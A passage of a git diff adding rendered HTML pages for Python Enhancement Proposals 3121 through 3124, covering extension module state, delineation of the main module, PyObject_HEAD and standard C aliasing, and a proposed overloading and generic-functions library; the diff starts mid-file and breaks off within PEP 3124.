+                       void *arg)
+{
+  Py_VISIT(xxstate(m)->ErrorObject);
+  Py_VISIT(xxstate(m)->Xxo_Type);
+  return 0;
+}
+
+static int xx_clear(PyObject *m)
+{
+  Py_CLEAR(xxstate(m)->ErrorObject);
+  Py_CLEAR(xxstate(m)->Xxo_Type);
+  return 0;
+}
+
+static struct PyModuleDef xxmodule = {
+  {}, /* m_base */
+  sizeof(struct xxstate),
+  &xx_methods,
+  0,  /* m_reload */
+  xx_traverse,
+  xx_clear,
+  0,  /* m_free - not needed, since all is done in m_clear */
+};
+
+PyObject*
+PyInit_xx()
+{
+  PyObject *res = PyModule_New("xx", &xxmodule);
+  if (!res) return NULL;
+  xxstate(res)->ErrorObject = PyErr_NewException("xx.error", NULL, NULL);
+  if (!xxstate(res)->ErrorObject) {
+    Py_DECREF(res);
+    return NULL;
+  }
+  xxstate(res)->Xxo_Type = PyType_Copy(&Xxo_Type);
+  if (!xxstate(res)->Xxo_Type) {
+    Py_DECREF(res);
+    return NULL;
+  }
+  return res;
+}
+
+
+
+
+

Discussion

+

Tim Peters reports in [1] that PythonLabs considered such a feature +at one point, and lists the following additional hooks which aren’t +currently supported in this PEP:

+
• when the module object is deleted from sys.modules
• when Py_Finalize is called
• when Python exits
• when the Python DLL is unloaded (Windows only)
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3121.rst

+

Last modified: 2023-10-11 09:31:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3122/index.html b/pep-3122/index.html new file mode 100644 index 00000000000..ecbb41370c5 --- /dev/null +++ b/pep-3122/index.html @@ -0,0 +1,366 @@ + PEP 3122 – Delineation of the main module | peps.python.org +
+
+


+ + +
+
+
+

PEP 3122 – Delineation of the main module

+
+
Author:
+
Brett Cannon
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2007
+
Post-History:
+

+
+
+
+
+
+

Attention

+

This PEP has been rejected. Guido views running scripts within a +package as an anti-pattern [3].

+
+
+

Abstract

+

Because of how name resolution works for relative imports in a world where PEP 328 is implemented, executing modules within a package ceases to be possible. This failing stems from the fact that the module being executed as the “main” module replaces its __name__ attribute with "__main__" instead of leaving it as the absolute name of the module. This breaks import’s ability to resolve relative imports from the main module into absolute names.

+

In order to resolve this issue, this PEP proposes to change how the main module is delineated. Leaving the __name__ attribute of a module alone and setting sys.main to the name of the main module will allow at least some instances of executing a module within a package that uses relative imports.

+

This PEP does not address the idea of introducing a module-level +function that is automatically executed like PEP 299 proposes.

+
+
+

The Problem

+

With the introduction of PEP 328, relative imports became dependent on the __name__ attribute of the module performing the import. This is because the dots in a relative import are used to strip away parts of the calling module’s name to calculate where in the package hierarchy an import should fall (prior to PEP 328, relative imports could fail and would fall back on absolute imports, which had a chance of succeeding).

+

For instance, consider the import from .. import spam made from the +bacon.ham.beans module (bacon.ham.beans is not a package +itself, i.e., does not define __path__). Name resolution of the +relative import takes the caller’s name (bacon.ham.beans), splits +on dots, and then slices off the last n parts based on the level +(which is 2). In this example both ham and beans are dropped +and spam is joined with what is left (bacon). This leads to +the proper import of the module bacon.spam.
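
+

The resolution just described can be sketched as a small Python function (a simplified stand-in for the real algorithm; the helper name is invented for illustration):

+
def resolve_relative(caller, name, level):
+    # resolve_relative('bacon.ham.beans', 'spam', 2) -> 'bacon.spam'
+    parts = caller.split('.')[:-level]   # slice off the last `level` parts
+    if not parts:
+        raise ImportError('relative import from a non-package')
+    return '.'.join(parts + [name])
+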

+

This reliance on the __name__ attribute of a module when handling +relative imports becomes an issue when executing a script within a +package. Because the executing script has its name set to +'__main__', import cannot resolve any relative imports, leading to +an ImportError.

+

For example, assume we have a package named bacon with an +__init__.py file containing:

+
from . import spam
+
+
+

Also create a module named spam within the bacon package (it +can be an empty file). Now if you try to execute the bacon +package (either through python bacon/__init__.py or +python -m bacon) you will get an ImportError about trying to +do a relative import from within a non-package. Obviously the import +is valid, but because of the setting of __name__ to '__main__' +import thinks that bacon/__init__.py is not in a package since no +dots exist in __name__. To see how the algorithm works in more +detail, see importlib.Import._resolve_name() in the sandbox +[2].

+

Currently a work-around is to remove all relative imports in the module being executed and make them absolute. This is unfortunate, though, as one should not be required to use a specific style of import just so that a module in a package can be executed.

+
+
+

The Solution

+

The solution to the problem is to not change the value of __name__ +in modules. But there still needs to be a way to let executing code +know it is being executed as a script. This is handled with a new +attribute in the sys module named main.

+

When a module is being executed as a script, sys.main will be set +to the name of the module. This changes the current idiom of:

+
if __name__ == '__main__':
+    ...
+
+
+

to:

+
import sys
+if __name__ == sys.main:
+    ...
+
+
+

The newly proposed solution does introduce an added line of +boilerplate which is a module import. But as the solution does not +introduce a new built-in or module attribute (as discussed in +Rejected Ideas) it has been deemed worth the extra line.

+

Another issue with the proposed solution (which applies to all the rejected ideas as well) is that it does not directly solve the problem of discovering the name of a file. Consider python bacon/spam.py. By the file name alone it is not obvious whether bacon is a package. In order to properly find this out, the current directory must be on sys.path and bacon/__init__.py must exist.

+

But this is the simple example. Consider python ../spam.py. From the file name alone it is not at all clear whether spam.py is in a package or not. One possible solution is to find out what the absolute path of .. is, check whether a file named __init__.py exists there, and then see whether the directory is on sys.path. If it is not, then continue to walk up the directories until no more __init__.py files are found or the directory is found on sys.path.
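
+

That walk might look roughly like the following sketch (the helper name is invented, and a real implementation would need more care with symlinks and path normalization):

+
import os, sys
+
+def find_anchor(script_path):
+    directory = os.path.dirname(os.path.abspath(script_path))
+    # Walk up while __init__.py files keep appearing, stopping as
+    # soon as a directory on sys.path is reached.
+    while os.path.isfile(os.path.join(directory, '__init__.py')):
+        if directory in sys.path:
+            return directory
+        directory = os.path.dirname(directory)
+    return directory if directory in sys.path else None
+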

+

This could potentially be an expensive process. If the package depth +happens to be deep then it could require a large amount of disk access +to discover where the package is anchored on sys.path, if at all. +The stat calls alone can be expensive if the file system the executed +script is on is something like NFS.

+

Because of these issues, only when the -m command-line argument (introduced by PEP 338) is used will __name__ be set to the module’s real name. Otherwise the fallback semantics of setting __name__ to "__main__" will occur. sys.main will still be set to the proper value, regardless of what __name__ is set to.

+
+
+

Implementation

+

When the -m option is used, sys.main will be set to the argument passed in. sys.argv will be adjusted as it is currently. Then the equivalent of __import__(sys.main) will occur. This differs from current semantics as the runpy module fetches the code object for the file specified by the module name in order to explicitly set __name__ and other attributes. This is no longer needed as import can perform its normal operation in this situation.
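
+

In rough Python terms, the proposed -m handling reduces to something like this (sys.main is the attribute proposed by this PEP; the function name is invented for illustration):

+
import sys
+
+def run_module_as_main(modname):
+    sys.main = modname    # record the real name of the main module
+    __import__(modname)   # a plain import now does the rest
+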

+

If a file name is specified, then sys.main will be set to +"__main__". The specified file will then be read and have a code +object created and then be executed with __name__ set to +"__main__". This mirrors current semantics.

+
+
+

Transition Plan

+

In order for Python 2.6 to be able to support both the current +semantics and the proposed semantics, sys.main will always be set +to "__main__". Otherwise no change will occur for Python 2.6. +This unfortunately means that no benefit from this change will occur +in Python 2.6, but it maximizes compatibility for code that is to +work as much as possible with 2.6 and 3.0.

+

To help transition to the new idiom, 2to3 [1] will gain a rule to +transform the current if __name__ == '__main__': ... idiom to the +new one. This will not help with code that checks __name__ +outside of the idiom, though.

+
+
+

Rejected Ideas

+
+

__main__ built-in

+

A counter-proposal was to introduce a built-in named __main__. The value of the built-in would be the name of the module being executed (just like the proposed sys.main). This would lead to a new idiom of:

+
if __name__ == __main__:
+    ...
+
+
+

A drawback is that the syntactic difference is subtle; the dropping +of quotes around “__main__”. Some believe that for existing Python +programmers bugs will be introduced where the quotation marks will be +put on by accident. But one could argue that the bug would be +discovered quickly through testing as it is a very shallow bug.

+

While the name of the built-in could obviously be different (e.g., main), the other drawback is that it introduces a new built-in. With a simple solution such as sys.main being possible without adding another built-in to Python, this proposal was rejected.

+
+
+

__main__ module attribute

+

Another proposal was to add a __main__ attribute to every module. For the one that was executing as the main module, the attribute would have a true value while all other modules had a false value. This has the nice consequence of simplifying the main module idiom to:

+
if __main__:
+    ...
+
+
+

The drawback was the introduction of a new module attribute. It also +required more integration with the import machinery than the proposed +solution.

+
+
+

Use __file__ instead of __name__

+

Any of the proposals could be changed to use the __file__ +attribute on modules instead of __name__, including the current +semantics. The problem with this is that with the proposed solutions +there is the issue of modules having no __file__ attribute defined +or having the same value as other modules.

+

The problem that comes up with the current semantics is you still have +to try to resolve the file path to a module name for the import to +work.

+
+
+

Special string subclass for __name__ that overrides __eq__

+

One proposal was to define a subclass of str that overrode the +__eq__ method so that it would compare equal to "__main__" as +well as the actual name of the module. In all other respects the +subclass would be the same as str.

+

This was rejected as it seemed like too much of a hack.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3122.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3123/index.html b/pep-3123/index.html new file mode 100644 index 00000000000..f0bf74c1e15 --- /dev/null +++ b/pep-3123/index.html @@ -0,0 +1,263 @@ + PEP 3123 – Making PyObject_HEAD conform to standard C | peps.python.org +
+
+


+ + +
+
+
+

PEP 3123 – Making PyObject_HEAD conform to standard C

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

Python currently relies on undefined C behavior, with its +usage of PyObject_HEAD. This PEP proposes to change that +into standard C.

+
+
+

Rationale

+

Standard C defines that an object must be accessed only through a +pointer of its type, and that all other accesses are undefined +behavior, with a few exceptions. In particular, the following +code has undefined behavior:

+
#include <Python.h>   /* for PyObject_HEAD */
+#include <stdlib.h>   /* for malloc() */
+
+struct FooObject{
+  PyObject_HEAD
+  int data;
+};
+
+PyObject *foo(struct FooObject*f){
+ return (PyObject*)f;
+}
+
+int bar(){
+ struct FooObject *f = malloc(sizeof(struct FooObject));
+ PyObject *o = foo(f);
+ f->ob_refcnt = 0;
+ o->ob_refcnt = 1;
+ return f->ob_refcnt;
+}
+
+
+

The problem here is that the storage is accessed both as if it were a PyObject and as a struct FooObject.

+

Historically, compilers did not have any problems with this code. However, modern compilers use that clause as an optimization opportunity, finding that f->ob_refcnt and o->ob_refcnt cannot possibly refer to the same memory, and that therefore the function should return 0, without having to fetch the value of ob_refcnt at all in the return statement. For GCC, Python now uses -fno-strict-aliasing to work around that problem; with other compilers, the code may simply exhibit undefined behavior. Even with GCC, using -fno-strict-aliasing may pessimize the generated code unnecessarily.

+
+
+

Specification

+

Standard C has one specific exception to its aliasing rules, designed precisely to support the case of Python: a value of a struct type may also be accessed through a pointer to the first field. E.g. if a struct starts with an int, the struct * may also be cast to an int *, making it possible to write int values into the first field.

+

For Python, PyObject_HEAD and PyObject_VAR_HEAD will be changed +to not list all fields anymore, but list a single field of type +PyObject/PyVarObject:

+
typedef struct _object {
+  _PyObject_HEAD_EXTRA
+  Py_ssize_t ob_refcnt;
+  struct _typeobject *ob_type;
+} PyObject;
+
+typedef struct {
+  PyObject ob_base;
+  Py_ssize_t ob_size;
+} PyVarObject;
+
+#define PyObject_HEAD        PyObject ob_base;
+#define PyObject_VAR_HEAD    PyVarObject ob_base;
+
+
+

Types defined as a fixed-size structure will then include PyObject as their first field, and variable-sized objects PyVarObject. E.g.:

+
typedef struct {
+  PyObject ob_base;
+  PyObject *start, *stop, *step;
+} PySliceObject;
+
+typedef struct {
+  PyVarObject ob_base;
+  PyObject **ob_item;
+  Py_ssize_t allocated;
+} PyListObject;
+
+
+

The above definitions of PyObject_HEAD are normative, so extension +authors MAY either use the macro, or put the ob_base field explicitly +into their structs.

+

As a convention, the base field SHOULD be called ob_base. However, all +accesses to ob_refcnt and ob_type MUST cast the object pointer to +PyObject* (unless the pointer is already known to have that type), and +SHOULD use the respective accessor macros. To simplify access to +ob_type, ob_refcnt, and ob_size, macros:

+
#define Py_TYPE(o)    (((PyObject*)(o))->ob_type)
+#define Py_REFCNT(o)  (((PyObject*)(o))->ob_refcnt)
+#define Py_SIZE(o)    (((PyVarObject*)(o))->ob_size)
+
+
+

are added. E.g. the code blocks

+
#define PyList_CheckExact(op) ((op)->ob_type == &PyList_Type)
+
+return func->ob_type->tp_name;
+
+
+

need to be changed to:

+
#define PyList_CheckExact(op) (Py_TYPE(op) == &PyList_Type)
+
+return Py_TYPE(func)->tp_name;
+
+
+

For initialization of type objects, the current sequence

+
PyObject_HEAD_INIT(NULL)
+0, /* ob_size */
+
+
+

becomes incorrect, and must be replaced with

+
PyVarObject_HEAD_INIT(NULL, 0)
+
+
+
+
+

Compatibility with Python 2.6

+

To support modules that compile with both Python 2.6 and Python 3.0, +the Py_* macros are added to Python 2.6. The macros Py_INCREF +and Py_DECREF will be changed to cast their argument to PyObject *, +so that module authors can also explicitly declare the ob_base +field in modules designed for Python 2.6.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3123.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3124/index.html b/pep-3124/index.html new file mode 100644 index 00000000000..1f3cb2844b9 --- /dev/null +++ b/pep-3124/index.html @@ -0,0 +1,1071 @@ + PEP 3124 – Overloading, Generic Functions, Interfaces, and Adaptation | peps.python.org +
+
+


+ + +
+
+
+

PEP 3124 – Overloading, Generic Functions, Interfaces, and Adaptation

+
+
Author:
+
Phillip J. Eby <pje at telecommunity.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Requires:
+
3107, 3115, 3119
+
Created:
+
28-Apr-2007
+
Post-History:
+
30-Apr-2007
+
Replaces:
+
245, 246
+
+
+
+
+
+

Deferred

+

See https://mail.python.org/pipermail/python-3000/2007-July/008784.html.

+
+
+

Abstract

+

This PEP proposes a new standard library module, overloading, to +provide generic programming features including dynamic overloading +(aka generic functions), interfaces, adaptation, method combining (ala +CLOS and AspectJ), and simple forms of aspect-oriented programming +(AOP).

+

The proposed API is also open to extension; that is, it will be +possible for library developers to implement their own specialized +interface types, generic function dispatchers, method combination +algorithms, etc., and those extensions will be treated as first-class +citizens by the proposed API.

+

The API will be implemented in pure Python with no C, but may have +some dependency on CPython-specific features such as sys._getframe +and the func_code attribute of functions. It is expected that +e.g. Jython and IronPython will have other ways of implementing +similar functionality (perhaps using Java or C#).

+
+
+

Rationale and Goals

+

Python has always provided a variety of built-in and standard-library +generic functions, such as len(), iter(), pprint.pprint(), +and most of the functions in the operator module. However, it +currently:

+
1. does not have a simple or straightforward way for developers to create new generic functions,
2. does not have a standard way for methods to be added to existing generic functions (i.e., some are added using registration functions, others require defining __special__ methods, possibly by monkeypatching), and
3. does not allow dispatching on multiple argument types (except in a limited form for arithmetic operators, where “right-hand” (__r*__) methods can be used to do two-argument dispatch).
+

In addition, it is currently a common anti-pattern for Python code +to inspect the types of received arguments, in order to decide what +to do with the objects. For example, code may wish to accept either +an object of some type, or a sequence of objects of that type.

+

Currently, the “obvious way” to do this is by type inspection, but +this is brittle and closed to extension. A developer using an +already-written library may be unable to change how their objects are +treated by such code, especially if the objects they are using were +created by a third party.

+

Therefore, this PEP proposes a standard library module to address +these, and related issues, using decorators and argument annotations +(PEP 3107). The primary features to be provided are:

+
• a dynamic overloading facility, similar to the static overloading found in languages such as Java and C++, but including optional method combination features as found in CLOS and AspectJ.
• a simple “interfaces and adaptation” library inspired by Haskell’s typeclasses (but more dynamic, and without any static type-checking), with an extension API to allow registering user-defined interface types such as those found in PyProtocols and Zope.
• a simple “aspect” implementation to make it easy to create stateful adapters and to do other stateful AOP.
+

These features are to be provided in such a way that extended +implementations can be created and used. For example, it should be +possible for libraries to define new dispatching criteria for +generic functions, and new kinds of interfaces, and use them in +place of the predefined features. For example, it should be possible +to use a zope.interface interface object to specify the desired +type of a function argument, as long as the zope.interface package +registered itself correctly (or a third party did the registration).

+

In this way, the proposed API simply offers a uniform way of accessing +the functionality within its scope, rather than prescribing a single +implementation to be used for all libraries, frameworks, and +applications.

+
+
+

User API

+

The overloading API will be implemented as a single module, named +overloading, providing the following features:

+
+

Overloading/Generic Functions

+

The @overload decorator allows you to define alternate +implementations of a function, specialized by argument type(s). A +function with the same name must already exist in the local namespace. +The existing function is modified in-place by the decorator to add +the new implementation, and the modified function is returned by the +decorator. Thus, the following code:

+
from overloading import overload
+from collections import Iterable
+
+def flatten(ob):
+    """Flatten an object to its component iterables"""
+    yield ob
+
+@overload
+def flatten(ob: Iterable):
+    for o in ob:
+        for ob in flatten(o):
+            yield ob
+
+@overload
+def flatten(ob: basestring):
+    yield ob
+
+
+

creates a single flatten() function whose implementation roughly +equates to:

+
def flatten(ob):
+    if isinstance(ob, basestring) or not isinstance(ob, Iterable):
+        yield ob
+    else:
+        for o in ob:
+            for ob in flatten(o):
+                yield ob
+
+
+

except that the flatten() function defined by overloading +remains open to extension by adding more overloads, while the +hardcoded version cannot be extended.

+

For example, if someone wants to use flatten() with a string-like +type that doesn’t subclass basestring, they would be out of luck +with the second implementation. With the overloaded implementation, +however, they can either write this:

+
@overload
+def flatten(ob: MyString):
+    yield ob
+
+
+

or this (to avoid copying the implementation):

+
from overloading import RuleSet
+RuleSet(flatten).copy_rules((basestring,), (MyString,))
+
+
+

(Note also that, although PEP 3119 proposes that it should be possible +for abstract base classes like Iterable to allow classes like +MyString to claim subclass-hood, such a claim is global, +throughout the application. In contrast, adding a specific overload +or copying a rule is specific to an individual function, and therefore +less likely to have undesired side effects.)

+
+

@overload vs. @when

+

The @overload decorator is a common-case shorthand for the more +general @when decorator. It allows you to leave out the name of +the function you are overloading, at the expense of requiring the +target function to be in the local namespace. It also doesn’t support +adding additional criteria besides the ones specified via argument +annotations. The following function definitions have identical +effects, except for name binding side-effects (which will be described +below):

+
from overloading import when
+
+@overload
+def flatten(ob: basestring):
+    yield ob
+
+@when(flatten)
+def flatten(ob: basestring):
+    yield ob
+
+@when(flatten)
+def flatten_basestring(ob: basestring):
+    yield ob
+
+@when(flatten, (basestring,))
+def flatten_basestring(ob):
+    yield ob
+
+
+

The first definition above will bind flatten to whatever it was +previously bound to. The second will do the same, if it was already +bound to the when decorator’s first argument. If flatten is +unbound or bound to something else, it will be rebound to the function +definition as given. The last two definitions above will always bind +flatten_basestring to the function definition as given.

+

Using this approach allows you to both give a method a descriptive +name (often useful in tracebacks!) and to reuse the method later.

+

Except as otherwise specified, all overloading decorators have the +same signature and binding rules as @when. They accept a function +and an optional “predicate” object.

+

The default predicate implementation is a tuple of types with +positional matching to the overloaded function’s arguments. However, +an arbitrary number of other kinds of predicates can be created and +registered using the Extension API, and will then be usable with +@when and other decorators created by this module (like +@before, @after, and @around).

+
+
+
+

Method Combination and Overriding

+

When an overloaded function is invoked, the implementation with the +signature that most specifically matches the calling arguments is +the one used. If no implementation matches, a NoApplicableMethods +error is raised. If more than one implementation matches, but none of +the signatures are more specific than the others, an AmbiguousMethods +error is raised.

+

For example, the following pair of implementations are ambiguous, if +the foo() function is ever called with two integer arguments, +because both signatures would apply, but neither signature is more +specific than the other (i.e., neither implies the other):

+
def foo(bar:int, baz:object):
+    pass
+
+@overload
+def foo(bar:object, baz:int):
+    pass
+
+
+

In contrast, the following pair of implementations can never be +ambiguous, because one signature always implies the other; the +int/int signature is more specific than the object/object +signature:

+
def foo(bar:object, baz:object):
+    pass
+
+@overload
+def foo(bar:int, baz:int):
+    pass
+
+
+

A signature S1 implies another signature S2, if whenever S1 would +apply, S2 would also. A signature S1 is “more specific” than another +signature S2, if S1 implies S2, but S2 does not imply S1.
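
+

For the default tuple-of-types predicates, these relations reduce to pairwise subclass checks, roughly as follows (illustrative helpers only, not part of the proposed API):

+
def implies(s1, s2):
+    # S1 implies S2 if every position in S1 is a subclass of the
+    # corresponding position in S2.
+    return all(issubclass(t1, t2) for t1, t2 in zip(s1, s2))
+
+def more_specific(s1, s2):
+    return implies(s1, s2) and not implies(s2, s1)
+
+assert more_specific((int, int), (object, object))
+assert not implies((int, object), (object, int))   # the ambiguous pair
+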

+

Although the examples above have all used concrete or abstract types +as argument annotations, there is no requirement that the annotations +be such. They can also be “interface” objects (discussed in the +Interfaces and Adaptation section), including user-defined +interface types. (They can also be other objects whose types are +appropriately registered via the Extension API.)

+
+

Proceeding to the “Next” Method

+

If the first parameter of an overloaded function is named +__proceed__, it will be passed a callable representing the next +most-specific method. For example, this code:

+
def foo(bar:object, baz:object):
+    print "got objects!"
+
+@overload
+def foo(__proceed__, bar:int, baz:int):
+    print "got integers!"
+    return __proceed__(bar, baz)
+
+
+

Will print “got integers!” followed by “got objects!”.

+

If there is no next most-specific method, __proceed__ will be +bound to a NoApplicableMethods instance. When called, a new +NoApplicableMethods instance will be raised, with the arguments +passed to the first instance.

+

Similarly, if the next most-specific methods have ambiguous precedence +with respect to each other, __proceed__ will be bound to an +AmbiguousMethods instance, and if called, it will raise a new +instance.

+

Thus, a method can either check if __proceed__ is an error +instance, or simply invoke it. The NoApplicableMethods and +AmbiguousMethods error classes have a common DispatchError +base class, so isinstance(__proceed__, overloading.DispatchError) +is sufficient to identify whether __proceed__ can be safely +called.
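
+

In code, the guard looks like this (a sketch reusing the decorators introduced earlier):

+
from overloading import overload, DispatchError
+
+@overload
+def foo(__proceed__, bar: int, baz: int):
+    if isinstance(__proceed__, DispatchError):
+        return -1                  # no usable next method; fall back
+    return __proceed__(bar, baz)
+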

+

(Implementation note: using a magic argument name like __proceed__ +could potentially be replaced by a magic function that would be called +to obtain the next method. A magic function, however, would degrade +performance and might be more difficult to implement on non-CPython +platforms. Method chaining via magic argument names, however, can be +efficiently implemented on any Python platform that supports creating +bound methods from functions – one simply recursively binds each +function to be chained, using the following function or error as the +im_self of the bound method.)

+
+
+

“Before” and “After” Methods

+

In addition to the simple next-method chaining shown above, it is +sometimes useful to have other ways of combining methods. For +example, the “observer pattern” can sometimes be implemented by adding +extra methods to a function, that execute before or after the normal +implementation.

+

To support these use cases, the overloading module will supply +@before, @after, and @around decorators, that roughly +correspond to the same types of methods in the Common Lisp Object +System (CLOS), or the corresponding “advice” types in AspectJ.

+

Like @when, all of these decorators must be passed the function to +be overloaded, and can optionally accept a predicate as well:

+
from overloading import before, after
+
+def begin_transaction(db):
+    print "Beginning the actual transaction"
+
+@before(begin_transaction)
+def check_single_access(db: SingletonDB):
+    if db.inuse:
+        raise TransactionError("Database already in use")
+
+@after(begin_transaction)
+def start_logging(db: LoggableDB):
+    db.set_log_level(VERBOSE)
+
+
+

@before and @after methods are invoked either before or after +the main function body, and are never considered ambiguous. That +is, it will not cause any errors to have multiple “before” or “after” +methods with identical or overlapping signatures. Ambiguities are +resolved using the order in which the methods were added to the +target function.

+

“Before” methods are invoked most-specific method first, with +ambiguous methods being executed in the order they were added. All +“before” methods are called before any of the function’s “primary” +methods (i.e. normal @overload methods) are executed.

+

“After” methods are invoked in the reverse order, after all of the +function’s “primary” methods are executed. That is, they are executed +least-specific methods first, with ambiguous methods being executed in +the reverse of the order in which they were added.

+

The return values of both “before” and “after” methods are ignored, +and any uncaught exceptions raised by any methods (primary or other) +immediately end the dispatching process. “Before” and “after” methods +cannot have __proceed__ arguments, as they are not responsible +for calling any other methods. They are simply called as a +notification before or after the primary methods.

+

Thus, “before” and “after” methods can be used to check or establish +preconditions (e.g. by raising an error if the conditions aren’t met) +or to ensure postconditions, without needing to duplicate any existing +functionality.

+
+
+

“Around” Methods

+

The @around decorator declares a method as an “around” method. +“Around” methods are much like primary methods, except that the +least-specific “around” method has higher precedence than the +most-specific “before” method.

+

Unlike “before” and “after” methods, however, “Around” methods are +responsible for calling their __proceed__ argument, in order to +continue the invocation process. “Around” methods are usually used +to transform input arguments or return values, or to wrap specific +cases with special error handling or try/finally conditions, e.g.:

+
from overloading import around
+
+@around(commit_transaction)
+def lock_while_committing(__proceed__, db: SingletonDB):
+    with db.global_lock:
+        return __proceed__(db)
+
+
+

They can also be used to replace the normal handling for a specific +case, by not invoking the __proceed__ function.

+

The __proceed__ given to an “around” method will either be the +next applicable “around” method, a DispatchError instance, +or a synthetic method object that will call all the “before” methods, +followed by the primary method chain, followed by all the “after” +methods, and return the result from the primary method chain.

+

Thus, just as with normal methods, __proceed__ can be checked for +DispatchError-ness, or simply invoked. The “around” method should +return the value returned by __proceed__, unless of course it +wishes to modify or replace it with a different return value for the +function as a whole.

+
+
+

Custom Combinations

+

The decorators described above (@overload, @when, @before, +@after, and @around) collectively implement what in CLOS is +called the “standard method combination” – the most common patterns +used in combining methods.

+

Sometimes, however, an application or library may have use for a more +sophisticated type of method combination. For example, if you +would like to have “discount” methods that return a percentage off, +to be subtracted from the value returned by the primary method(s), +you might write something like this:

+
from overloading import always_overrides, merge_by_default
+from overloading import Around, Before, After, Method, MethodList
+
+class Discount(MethodList):
+    """Apply return values as discounts"""
+
+    def __call__(self, *args, **kw):
+        retval = self.tail(*args, **kw)
+        for sig, body in self.sorted():
+            retval -= retval * body(*args, **kw)
+        return retval
+
+# merge discounts by priority
+merge_by_default(Discount)
+
+# discounts have precedence over before/after/primary methods
+always_overrides(Discount, Before)
+always_overrides(Discount, After)
+always_overrides(Discount, Method)
+
+# but not over "around" methods
+always_overrides(Around, Discount)
+
+# Make a decorator called "discount" that works just like the
+# standard decorators...
+discount = Discount.make_decorator('discount')
+
+# and now let's use it...
+def price(product):
+    return product.list_price
+
+@discount(price)
+def ten_percent_off_shoes(product: Shoe):
+    return Decimal('0.1')
+
+
+

Similar techniques can be used to implement a wide variety of +CLOS-style method qualifiers and combination rules. The process of +creating custom method combination objects and their corresponding +decorators is described in more detail under the Extension API +section.

+

Note, by the way, that the @discount decorator shown will work +correctly with any new predicates defined by other code. For example, +if zope.interface were to register its interface types to work +correctly as argument annotations, you would be able to specify +discounts on the basis of its interface types, not just classes or +overloading-defined interface types.

+

Similarly, if a library like RuleDispatch or PEAK-Rules were to +register an appropriate predicate implementation and dispatch engine, +one would then be able to use those predicates for discounts as well, +e.g.:

+
from somewhere import Pred  # some predicate implementation
+
+@discount(
+    price,
+    Pred("isinstance(product,Shoe) and"
+         " product.material.name=='Blue Suede'")
+)
+def forty_off_blue_suede_shoes(product):
+    return Decimal('0.4')
+
+
+

The process of defining custom predicate types and dispatching engines +is also described in more detail under the Extension API section.

+
+
+
+

Overloading Inside Classes

+

All of the decorators above have a special additional behavior when +they are directly invoked within a class body: the first parameter +(other than __proceed__, if present) of the decorated function +will be treated as though it had an annotation equal to the class +in which it was defined.

+

That is, this code:

+
class And(object):
+    # ...
+    @when(get_conjuncts)
+    def __conjuncts(self):
+        return self.conjuncts
+
+
+

produces the same effect as this (apart from the existence of a +private method):

+
class And(object):
+    # ...
+
+@when(get_conjuncts)
+def get_conjuncts_of_and(ob: And):
+    return ob.conjuncts
+
+
+

This behavior is both a convenience enhancement when defining lots of +methods, and a requirement for safely distinguishing multi-argument +overloads in subclasses. Consider, for example, the following code:

+
class A(object):
+    def foo(self, ob):
+        print "got an object"
+
+    @overload
+    def foo(__proceed__, self, ob:Iterable):
+        print "it's iterable!"
+        return __proceed__(self, ob)
+
+
+class B(A):
+    foo = A.foo     # foo must be defined in local namespace
+
+    @overload
+    def foo(__proceed__, self, ob:Iterable):
+        print "B got an iterable!"
+        return __proceed__(self, ob)
+
+
+

Due to the implicit class rule, calling B().foo([]) will print +“B got an iterable!” followed by “it’s iterable!”, and finally, +“got an object”, while A().foo([]) would print only the messages +defined in A.

+

Conversely, without the implicit class rule, the two “Iterable” +methods would have the exact same applicability conditions, so calling +either A().foo([]) or B().foo([]) would result in an +AmbiguousMethods error.

+

It is currently an open issue to determine the best way to implement +this rule in Python 3.0. Under Python 2.x, a class’ metaclass was +not chosen until the end of the class body, which means that +decorators could insert a custom metaclass to do processing of this +sort. (This is how RuleDispatch, for example, implements the implicit +class rule.)

+

PEP 3115, however, requires that a class’ metaclass be determined +before the class body has executed, making it impossible to use this +technique for class decoration any more.

+

At this writing, discussion on this issue is ongoing.

+
+
+

Interfaces and Adaptation

+

The overloading module provides a simple implementation of +interfaces and adaptation. The following example defines an +IStack interface, and declares that list objects support it:

+
from overloading import abstract, Interface
+
+class IStack(Interface):
+    @abstract
+    def push(self, ob):
+        """Push 'ob' onto the stack"""
+
+    @abstract
+    def pop(self):
+        """Pop a value and return it"""
+
+
+when(IStack.push, (list, object))(list.append)
+when(IStack.pop, (list,))(list.pop)
+
+mylist = []
+mystack = IStack(mylist)
+mystack.push(42)
+assert mystack.pop()==42
+
+
+

The Interface class is a kind of “universal adapter”. It accepts +a single argument: an object to adapt. It then binds all its methods +to the target object, in place of itself. Thus, calling +mystack.push(42) is the same as calling +IStack.push(mylist, 42).
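
+

That binding behaviour can be approximated in a few lines of modern Python (a deliberately naive sketch, not the proposed implementation):

+
import types
+
+class InterfaceSketch:
+    def __init__(self, subject):
+        # Rebind each public function of the interface so that it
+        # receives the adapted object, not the adapter, as 'self'.
+        for name in dir(type(self)):
+            attr = getattr(type(self), name)
+            if callable(attr) and not name.startswith('_'):
+                setattr(self, name, types.MethodType(attr, subject))
+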

+

The @abstract decorator marks a function as being abstract: i.e., +having no implementation. If an @abstract function is called, +it raises NoApplicableMethods. To become executable, overloaded +methods must be added using the techniques previously described. (That +is, methods can be added using @when, @before, @after, +@around, or any custom method combination decorators.)

+

In the example above, the list.append method is added as a method +for IStack.push() when its arguments are a list and an arbitrary +object. Thus, IStack.push(mylist, 42) is translated to +list.append(mylist, 42), thereby implementing the desired +operation.

+
+

Abstract and Concrete Methods

+

Note, by the way, that the @abstract decorator is not limited to +use in interface definitions; it can be used anywhere that you wish to +create an “empty” generic function that initially has no methods. In +particular, it need not be used inside a class.

+

Also note that interface methods need not be abstract; one could, for +example, write an interface like this:

+
class IWriteMapping(Interface):
